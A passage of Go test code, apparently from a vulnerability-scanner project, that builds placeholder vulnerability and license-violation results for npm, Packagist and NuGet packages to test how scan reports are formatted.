Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "two_sources_with_the_same_vulnerable_package", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, MaxSeverity: "8.3", }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{ IDs: []string{"OSV-1", "GHSA-123"}, Aliases: []string{"OSV-1", "GHSA-123"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "GHSA-123", Summary: "Something scary!", Aliases: []string{"OSV-1"}, Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "two_sources_with_packages,_one_vulnerability", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Vulnerabilities: []*osvschema.Vulnerability{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}, MaxSeverity: "4.3"}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Commit: "123abc", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abcxyz", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ { IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }, { IDs: []string{"OSV-5"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-5": {Called: true}, }, }, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ { IDs: []string{"OSV-3"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-3": {Called: true}, }, }, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_vulnerabilities,_some_missing_content", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "OSV-1", Details: "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!"}, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine3", Version: "0.10.2-rc", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "OSV-2"}, }, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } func testOutputWithLicenseViolations(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) experimentalAnalysisConfig := models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{Summary: false, Allowlist: []models.License{"ISC"}}, } tests := []outputTestCase{ { name: "no_sources", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{}, }, }, }, { name: "one_source_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "multiple_sources_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "one_source_with_one_package,_no_licenses", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_an_unknown_license", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"UNKNOWN"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_no_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_no_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_just_a_commit_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_license_violation_(dev)", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "two_sources_with_packages,_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: 